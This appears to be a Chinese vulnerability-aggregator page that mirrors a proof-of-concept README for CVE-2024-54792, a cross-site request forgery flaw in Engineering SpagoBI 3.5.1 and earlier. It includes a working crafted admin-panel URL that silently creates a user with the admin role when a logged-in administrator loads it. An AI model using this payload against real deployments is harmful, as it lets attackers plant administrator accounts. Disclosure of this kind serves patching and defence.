关联漏洞
标题:
Engineering SpagoBI 跨站请求伪造漏洞
(CVE-2024-54792)
描述:Engineering SpagoBI是意大利Engineering公司的一款开源的基于J2EE框架的商业智能套件。该套件主要用于管理BI对象,如报表、记分卡以及数据挖掘模型等,并可通过BI管理器控制、校验、验证与分发这些BI对象。 Engineering SpagoBI 3.5.1及之前版本存在安全漏洞,该漏洞源于存在跨站请求伪造漏洞,导致攻击者可以引导其他用户执行不需要的操作。
描述
SpagoBI csrf
介绍
# CVE-2024-54792
**Severity :** **Medium** (**6.1**)
**CVSS score :** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
## Summary :
Engineering Ingegneria Informatica **SpagoBI** version **3.5.1** is affected by **CSRF** in the admin panel that manages user grants.
## Poc
The add/edit/delete user panel, accessible by the admin user, do not contains csrf countermeasures.
### Steps to Reproduce :
1. Embed this url customizing it with: **victim_host**, **custom_username** and **custom_password** and into HTML page that makes the request and trick a victim with admin rights logged into the page to visit it. A new user will be created in the platform.
```
https://<victim_host>/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION&SBI_EXECUTION_ID=-1&LIGHT_NAVIGATOR_DISABLED=TRUE&MESSAGE_DET=USER_INSERT&_dc=1727100301044&userId=<custom_username>&fullName=<custom_username>&id=0&pwd=<custom_password>&userRoles=%5B%7B%22name%22%3A%22%2Fspagobi%2Fadmin%22%2C%22id%22%3A5%2C%22description%22%3A%22%2Fspagobi%2Fadmin%22%2C%22checked%22%3Atrue%7D%5D&userAttributes=%5B%5D
```
## Affected Version Details :
- <= 3.5.1
## Impact :
The attacker can trick a victim logged with admin rights to perform a GET request that inserts a user with ad hoc credentials in the platform unconsciously, due to the lack of CSRF countermeasures. Then he can log in with the previously selected credentials.
## Mitigation :
- Update to the latest version.
## References :
-
文件快照
[4.0K] /data/pocs/c816e8797cded0824cb75cdb34b0cf5d6a314e11
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。